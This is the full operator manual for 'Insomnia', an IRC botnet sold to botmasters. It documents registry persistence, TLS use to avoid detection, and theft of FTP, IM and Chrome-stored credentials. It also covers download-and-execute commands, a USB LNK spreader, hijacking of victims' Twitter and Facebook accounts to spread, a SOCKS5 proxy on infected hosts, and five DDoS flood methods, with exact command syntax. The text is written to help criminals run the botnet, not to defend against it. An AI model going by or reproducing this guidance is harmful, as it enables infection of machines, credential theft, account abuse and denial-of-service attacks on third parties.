Table of Contents 1. Summary 2. Core Features 3. Malware Removal 4. SOCKS5 5. DDoS 6. Spreading Modules 7. Topic Generator Explained 8. Complete command list Summary Insomnia was developed in Visual Studio 2010 using the C# language. The binary is compiled under the 2.0 distribution of the .NET Framework. Insomnia was primarily designed for the botmaster who plans to build a network with machines that have the .NET framework installed. During development, the infection of newer operating systems was considered, and Insomnia is fully compatible with Windows 8 Development Preview at this time, and should work fine on the release builds. Insomnia has been tested to function on Windows NT based operating systems, specifically the following: Windows XP Windows Server 2003 / R2 Windows Vista Windows Server 2008 / R2 Windows 7 Windows 8 Development Preview If Insomnia acquires administrative rights on the target machine, it will install to HKLM rather than HKCU, allowing it to be executed under all user accounts on the machine. It will also make use of specific Windows API calls that only function under elevated permissions, improving the functionality of some malware removal features such as Ruskill. Upon execution, Insomnia gathers it’s country location from http://api.wipmania.com. If for some reason this website can’t be accessed, Insomnia will default to system locale information. Insomnia’s nick generation pattern is based on a series of information. Here is a breakdown: n{US|XP-32a}dnskifj The lowercase ‘n’ in the nick signifies that Insomnia has recently been installed within the past hour, implying that it is most likely a new installation. The next part is the GeoIP location of the PC Insomnia is running on. US being United States. This is followed by the version of windows (Windows XP 32 bit), and the lowercase ‘a’ signifies that the bot is running with administrative privileges. If the bot is only running as a standard user, it will show a lowercase ‘u’ instead. The rest of the nick is made up of seven randomly generated characters to avoid nick collision. Core Features Connection Information Insomnia supports the IRC protocol along with SSL (Secure-Socket-Layer) connections. SSL is recommended, as the downside to normal IRC connections is that they are easily recognized. Using normal connections can put Insomnia at risk of detection, while exposing information that is exchanged on your network. Insomnia may be compiled to support connections to multiple servers at request. There is no limit at this time. Quit Messages IRC quit messages are decided by listening to WM_QUERYENDSESSION. This lets insomnia include the reason the process is terminating, if it is related to a Windows session attempting to close. If the bot process is terminated abnormally or fails to acquire a reason, it will be the standard ‚Connection reset by peer‛. Currently Insomnia detects and outputs three types of quit messages: Windows is shutting down… Windows is logging off… Windows is going to sleep… Registry Persistence Insomnia actively monitors the registry for changes, by pinvoking a series of Windows API functions such as RegNotifyKeyChangeValue. If it finds out that its registry key was modified or deleted, it will fix it immediately. Core command list These commands signify features that are found in the basic compile of Insomnia, and are included in every binary available for purchase, without the addition of separate modules. Command .v .m on/off .avinfo .j #channel .p #channel .sort .unsort .permsort .rm .rc .ftp .im .read URL .open FILE/URL .open FILE/URL –h .dl URL .dl URL –m .dl URL –t X The rest of the commands are discussed in their appropriate sections below. You can find a complete command list on the very last page of this document. Description Outputs version, MD5 hash, process path, registry location. Toggles mute (blocks all output). Display current Antivirus/Firewall programs installed. (Vista+) Joins a channel. Parts a channel. Sorts bots into channels based on their country. (#US, #RU, etc). Parts the sorted channels. Sorts the bots based on privileges. (#users/#admins). Completely removes Insomnia from the machine. Reconnects to IRC after waiting 10 seconds. Outputs saved FTP credentials on the machine. Outputs saved IM credentials on the machine. Reads encrypted topic commands from a remote URL Opens a URL or file on machine. Opens a URL or file on the machine but hides the window. Downloads a file and executes it. Downloads a file and executes it in memory (.NET files only) Downloads a file and terminates after X seconds have passed. Malware Removal Botkiller Insomnia includes two types of malware removal commands. Those are as follows: Description Runs the standard botkiller module. Runs the botkiller module that terminates injected bots. The standard botkiller module works around a counter system. It first scans temporary folders, including %APPDATA% for any executable files that are currently running. It then checks if the files have a ‚hidden‛ attribute or not. Other checks are then performed including checking the registry startup locations. If an executable program violates a certain number of these checks, it’s safe to consider it ‚possibly malicious‛, and Insomnia will then terminate it, delete the registry key, and output and TCP connections associated with that process. The botkiller module that terminates injected bots uses a series of techniques to remove nearly all bots that inject into explorer/iexplore. Both of these commands perform different actions. If you want to give the best effort to clean a system from other common malware, it’s recommended you run both of these commands. Command .dl URL -r Description Starts the download and initiates the Ruskill module on the file. Ruskill is initiated by calling the download function with the ‘r’ parameter. Files downloaded with Ruskill enabled will be monitored and information will be outputted to the Ruskill channel. Ruskill attempts to discover all files dropped by that malware along with all registry keys created, and then reverse those changes the next time the PC reboots. It uses a set of Windows API calls to make this possible, deleting target files after AUTOCHK but before Windows creates any page files. Administrative rights can affect how well this feature works. Ruskill uses API calls similar to those in ngrBot/Autumn/Other Antivirus/File Assassin software. DDoS Functionality Insomnia includes five different methods to initiate distributed denial of service attacks. Two methods are primarily aimed at exploiting vulnerabilities in the Apache web server, by consuming all sockets and resources. While initiating a DDoS command, insomnia will stop all other active DDoS threads before starting. This helps allocate threads for the new DDoS command while not consuming too many resources client-side, and saturating the upstream (which may cause the bot to disconnect temporarily). Command .arme HOST TIME .slow HOST TIME .layer4 HOST PORT TIME .layer7 HOST PORT TIME .udp HOST PORT TIME Description Multithreaded Multithreaded Multithreaded Multithreaded Multithreaded Apache Remote Memory Exhaustion flood. Slowloris Flood Layer4 (SYN) Flood Layer7 (HTTP GET) Flood UDP Flood ARME (Apache Remote Memory Exhaustion) This method was discovered in late 2011 and is a modified port of the perl script by Kingcope. Running this with enough connections can actually cause Apache to swap memory to file system after RAM is consumed, and may result in the process being terminated as the host system becomes unstable. Higher-end servers or properly modified/configured Apache installations may not be vulnerable. Slowloris This method was developed by RSNAKE and made popular in 2009. This C# port works in the exact same way but with random user agents, random content length, and random header data so it's even harder to block from the host machine. It also uses GET and POST to do the attack which seems to have better results than sticking with just one method. Slowloris can take a while to consume all the sockets on the host machine, but it always wins in the end. This method simply does an HTTP GET request on the index page, and downloads the page data. Works good in high numbers. If you are focusing attacks on Apache webservers with small numbers, then the methods above are recommended. This method uses SynSockets to flood the server with TCP connections. It's not too hard to block server-side and is an older method, but if a server is vulnerable then it's highly effective. This flood is ideal for neighborhood connections or larger servers if you have the manpower to do it, flooding with UDP packets containing random data. SOCKS5 Module Description Attempts to start the SOCKS5 server and report back with results. This command will signal Insomnia to start the SOCKS5 server and attempt to test it’s connection. If everything worked out with no errors, it will output the IP:PORT USER:PASS to IRC so you are able to use them. It also attempts to map ports with the included uPnP library. If it succeeds it will signify it in the output. [SOCKS]: Attempting to start SOCKS server… [SOCKS]: Listening on [127.0.0.1:9001] [user:pass] [uPnP=yes] Spreaders USB .LNK Spread This module runs automatically. Upon initial bot execution it scans for USB Removable Media. When found, it scans the drive for folders, creating appropriate LNK files and hiding the originals. It also listens for new devices and infects them as they are added. This module will output to IRC after a successful infection. [USB]: Completed LNK spread on (G:\) with 7 files. Twitter Command .twitter “msg” This module queries the chrome grabber for accounts that fit twitter.com, and attempts to login. If the login was a success, it proceeds to update the status to the specified message. This does NOT use the Twitter API and does NOT require OAuth. It simulates the http web requests made by a real browser to login to twitter and update the status. [TWITTER]: Status updated. (user@email.com => ‚msg‛ ) Description Updates twitter status on the system. Facebook Command .facebook “msg” This module queries the chrome grabber for accounts that fit facebook.com, and attempts to login. If the login was a success, it proceeds to gather information about the Facebook account required to login to the Facebook chat system via the XMPP protocol. Once the data is acquired, resources are disposed of and a chat session is initiated with the user's credentials. Once the module has access to the chat system, it will begin to send the message you provided with the given options. You can specify to send to only online/offline friends with the parameters above. You can also specify to send to a certain number of friends (the friends will be randomly chosen), by using the –f parameter followed by a number of your choice. [FACEBOOK]: Spreader module started. (user@email.com => ‚msg‛) Description Starts facebook spread module with specified message. Topic Generator Insomnia comes with a topic generation utility to help you secure your topic commands from prying eyes, and simplify commands that should be performed in sequential order. To use, please run the topic generator that was included with your purchase. Each customer gets a topic generator that encrypts based on your unique customer ID, so no one else with the topic generator could interact with your binary, compiled with the same customer ID. To use the Topic Generator, simply type in the commands exactly how you would in IRC, then click Add. The topic generator will add them to the listview, automatically parsing and detecting the parameters. When you are all finished, click Generate, and use the topic in IRC. If a topic is too big for the IRC topic character limit, you can host the encrypted commands and set the topic to the encrypted version of .read http://yoururl.com/commands.txt Complete Command List .m on/off .avinfo .j #channel .p #channel .sort .unsort .permsort .rm .rc .ftp .im .read URL .open FILE/URL .open FILE/URL –h .dl URL .dl URL –m .dl URL –t X .dl URL –r .socks .speedtest URL .bk .bk –i .getadmin .acc keyword .arme HOST TIME .slow HOST TIME .layer4 HOST PORT TIME .layer7 HOST PORT TIME .udp HOST PORT TIME Description Outputs version, MD5 hash, process path, registry location. Toggles mute (blocks all output). Display current Antivirus/Firewall programs installed. (Vista+) Joins a channel. Parts a channel. Sorts bots into channels based on their country. (#US, #RU, etc). Parts the sorted channels. Sorts the bots based on privileges. (#users/#admins). Completely removes Insomnia from the machine. Reconnects to IRC after waiting 10 seconds. Outputs saved FTP credentials on the machine. Outputs saved IM credentials on the machine. Reads encrypted topic commands from a remote URL Opens a URL or file on machine. Opens a URL or file on the machine but hides the window. Downloads a file and executes it. Downloads a file and executes it in memory (.NET files only) Downloads a file and terminates after X seconds have passed. Downloads a file with Ruskill and outputs to Ruskill channel. Attempts to start SOCKS5 server Download the URL and output speed information. Standard botkiller module Injected botkiller module Added by request. Prompts UAC for admin, if acquires, restarts. Chrome grabber based on url keyword. Leave keyword blank for all. Multithreaded Apache Remote Memory Exhaustion flood. Multithreaded Slowloris Flood Multithreaded Layer4 (SYN) Flood Multithreaded Layer7 (HTTP GET) Flood Multithreaded UDP Flood